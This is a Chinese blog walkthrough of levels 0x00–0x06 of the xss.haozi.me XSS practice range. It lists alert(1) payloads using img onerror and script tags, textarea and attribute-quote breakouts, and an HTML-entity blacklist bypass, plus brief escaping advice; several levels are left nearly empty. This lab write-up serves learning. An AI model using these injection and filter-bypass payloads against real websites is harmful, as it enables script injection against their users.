XSS靶场通关实践(xss.haozi靶场练习)0x00-0x06

最新推荐文章于 2024-10-05 11:45:58 发布
最新推荐文章于 2024-10-05 11:45:58 发布
阅读量75 收藏
点赞数
分类专栏: hacker 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crasher123/article/details/131295942
版权

0x00

input code写成:

<img src="x" onerror="alert(1)">

// 或者
<script>alert(1)</script>

 

0x01

考察最基本的标签闭合,此处相当于把前后的textarea给闭合掉。

标签闭合攻击通常发生在用户输入中包含未经正确处理的HTML标签或属性时。攻击者可以使用特殊字符(例如左尖括号“<”和右尖括号“>”),来欺骗客户端脚本,使其误识别用户输入中的HTML标签或属性。这样就可能导致客户端脚本生成的动态DOM元素不符合预期,从而导致安全漏洞。

以下是一个标签闭合攻击的示例:

var name = "<img src='attack.png'>";
var div = document.createElement('div');
div.innerHTML = "Hello, " + name;
document.body.appendChild(div);

在上述代码中,攻击者将一个img标签作为用户名输入,并将其赋值给变量name。然后,客户端脚本将name作为字符串的一部分添加到了div元素中,从而导致img标签被渲染到页面中。由于img标签中的src属性是攻击者指定的,因此可能会导致跨站点脚本攻击等安全问题。

</textarea><img src="x" onerror="alert(1)"><textarea>
或
</textarea><script>alert(1)</script><textarea>

为了防范标签闭合攻击,开发者应该使用适当的方法来转义和过滤用户输入。例如,可以使用innerHTML方法前先进行HTML编码,或者使用textContent方法来代替innerHTML方法。另外,还可以限制用户输入的内容,只允许输入特定字符或进行白名单过滤,以避免不必要的安全风险。

0x02

"><img src="x" onerror="alert(1)">
或
"><script>alert(1)</script>

0x03

单引号替换 

 0x04

 相当于黑名单里面加了`,所以需要采用html编码进行绕过

<img src="x" onerror="alert&#40;1&#41;">

0x05

 

 

0x06

过滤了以=结尾的字符,可以采用换行符绕过

 

 

野马算法创新
关注
专栏目录
xss.haozi.me靶场0x00-0x0A”通关教程
钟言的博客
03-12 5575
本篇介绍了xss.haozi.me靶场0x00到0x0A通关教程,详细内容包含了:一、靶场介绍 二、第一关 0x00 不做限制 三、第二关 0x01 文本闭合标签绕过 四、第三关 0x02 双引号闭合绕过 五、第四关 0x03 过滤括号 六、第五关 0x04 编码绕过 七、第六关 0x05 注释闭合绕过 八、第七关 0x06 换行绕过 九、第八关 0x07 删除标签 十、第九关 0x08 多加空格绕过 十一、第十关 0x09 闭合绕过 十二、第十一关 0x0A JS调用等内容
XSS靶场通关实践xss.haozi靶场练习)0x07-0x0A
crasher123的博客
06-20 85
利用容错性不闭合。
xss.haozi.me靶场“0x0B-0x12”通关教程
钟言的博客
03-13 4627
本篇xss.haozi.me靶场的“0x0B-0x12”通关教程,详细内容包含了一、0x0B 实体编码绕过 二、0x0C script绕过 三、0x0D 注释绕过 四、0X0E ſ符号绕过 五、0x0F 编码解码 六、0x10 直接执行 七、0x11 闭合绕过 八、0x12 闭合绕过等内容
xss靶场xss.haozi.me靶场详细通关教程
LawnCat的博客
03-27 2492
靶场来自xss.haozi.me,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。
XSS漏洞:xss.haozi.me靶场1-12 | A-F
weixin_68416970的博客
07-28 2880
XSS漏洞靶场xss.haozi.me靶场的1-12关、A-F关通关教程
XSS漏洞:xss.haozi.me靶场通关~0x00~0x090
m0_74214882的博客
07-25 626
标签中,并过滤了标签中返回,因为为RCDATA元素,在此标签中,只能返回
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2212
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss.haozi.me靶场通关参考
爆金币了,老登!
06-19 874
全关卡记录,所有靶场的payload
xss-haozi.me靶场通关
2301_80185313的博客
07-18 1068
xss-haozi.me靶场通关详解
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
xss.haozi.me弹窗练习0x00-0x10
weixin_52159400的博客
07-28 644
alert(1)
xss靶场练习xss.haozi.me解析及答案
lyz_yyds107的博客
08-05 1067
靶场绕过
Pikachu-Cross-Site Scripting-xss盲打
guanrongl的专栏
10-03 338
xss盲打,不是一种漏洞类型,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;
PIKACHU | PIKACHU 靶场 XSS 后台配置
Blue17 の 小窝
09-30 868
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。
Pikachu-xss防范措施 - href输出 & js输出
guanrongl的专栏
10-03 431
要想防止href 标签的xss : 一、可以做输入限定,只允许http 、https 的头的输入;二、结合输入限定后再做特殊字符转义。转义:所有输出到前端的数据,都根据输出点进行转义,比如输出到html中进行html实体转义,输入到 JS 里面的进行 JS 转义。过滤:根据业务需要进行过滤,如:输入点要求输入手机号,则只允许输入手机号格式的数字;从页面代码上看出,这是个href 标签,并且做了href特殊字符转换。核心点是:$ms == 'tmac'总体原则: 输入做过滤,输出做转义。
xss之dom类型
最新发布
m0_74741186的博客
10-05 336
上我们的pikachu。
Pikachu-Cross-Site Scripting-反射型xss(get)
guanrongl的专栏
10-02 521
存储型XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类型的XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取用户敏感信息或在用户浏览器中执行恶意操作。 通常,成功通过XSS-labs靶场的关键是了解XSS漏洞的原理和常见的防御措施。你可以通过学习相关的网络安全知识和参加相关的训练课程来提高对XSS漏洞的理解和攻防能力。同时,使用漏洞扫描工具和安全审计工具,如Burp Suite、OWASP ZAP等,可以帮助你发现并修复可能存在的XSS漏洞。 请记住,在进行任何安全测试或攻击前,确保获得合法的授权,并遵守适用的法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值